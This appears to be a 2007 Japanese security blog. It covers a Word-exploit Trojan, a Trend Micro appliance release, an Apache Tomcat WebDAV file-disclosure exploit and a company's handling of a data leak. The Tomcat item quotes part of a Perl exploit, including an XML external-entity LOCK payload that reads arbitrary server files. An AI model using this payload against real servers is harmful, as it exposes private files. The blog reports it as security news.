MS07-060のWordの脆弱性を悪用するウイルスが出ています。→ TROJ_MDROPPER.WN

検出名は、TROJ_MDROPPER.WNです。

メールにてMicrosoft Wordのファイルで到着して添付を開いた瞬間にウイルスに感染します。

Dropperが%Temp%\csrse.exeを落として実行するそうです。

This Trojan arrives as .DOC file attached to email messages spammed by another malware or a malicious user. It usually arrives using the file name Hope See Again.DOC.
It takes advantage of a Microsoft Office Word vulnerability to drop the following file:

  • %Temp%\csrse.exe

(Note: %Temp% is the Windows Temporary folder, which is usually C:\Windows\Temp or C:\WINNT\Temp.)


Trend Micro InterScan Web Security Appliance 3.1 公開とサポート開始のお知らせ

InterScan Web Security Appliance3.1が公開になっています。だんだんアプライアンス型に落ち着いていくのかな・・・

主な機能:

IWSAは、HTTP、FTPトラフィックを検索するWebセキュリティアプライアンスです。
お客さまの環境へ導入することにより、インターネットとのゲートウェイでウイルスやスパイウェアなどの脅威をブロックします。
  • ゲートウェイレベルでのウイルスやスパイウェアの検出・ブロック
  • 最新の脅威「Webからの脅威」に対応
  • 柔軟な構成
  • フィッシング対策
  • 感染時の復旧にも対応

詳細についてはこちらをご参照下さい。


Apache Tomcat (webdav) Remote File Disclosure Exploit

TomcatWebDAV昨日にてファイルを見ることが出来る脆弱性が存在するそうです。

#******************************************************
# Apache Tomcat Remote File Disclosure Zeroday Xploit
# kcdarookie aka eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************

この辺かな。

$KRADXmL = 
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";

print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";


So-net blog:Jemのセキュリティ追っかけ日記+α:丸紅インフォテックの情報漏洩

凸電 丸紅インフォテックの情報漏えい。びみょうな対応中みたいですなぁ

相手「この度は申し訳ございません。クレジットカードの情報が漏れた可能性があるので、変更して下さい」
私「それだけですか?」
相手「こちらからはその提案だけです」
私「うーん、可能性があるだけとしかないのですが、漏えい確認後の連絡は?」
相手「責任者に確認を取りますのでお待ち下さい。」
相手「現在、第三者機関に調査を依頼し、調査の結果、漏えいがあった場合に連絡します」
私「調査の結果、漏えいがない場合は連絡をくれないのですか?いつ調査が終わるかわからないので不安なのですが。」
相手「責任者に確認を取りますのでお待ち下さい。」
相手「連絡します。」
私「IDとパスワードも漏れたとあるが、変更は必要か?」
相手「責任者に確認を取りますのでお待ち下さい。」
相手「サイトを閉じているので、変更はできませんのでご安心ください」
私「???危険はないのですね。」
相手「現在アクセスできませんのでありません。」
私「その後の対応はどうするんですか?」
相手「責任者に確認を取りますのでお待ち下さい。」
相手「現在未定です。」

なんか不安な対応でした。
対応マニュアルがないので、仕方ないのでしょうけどね。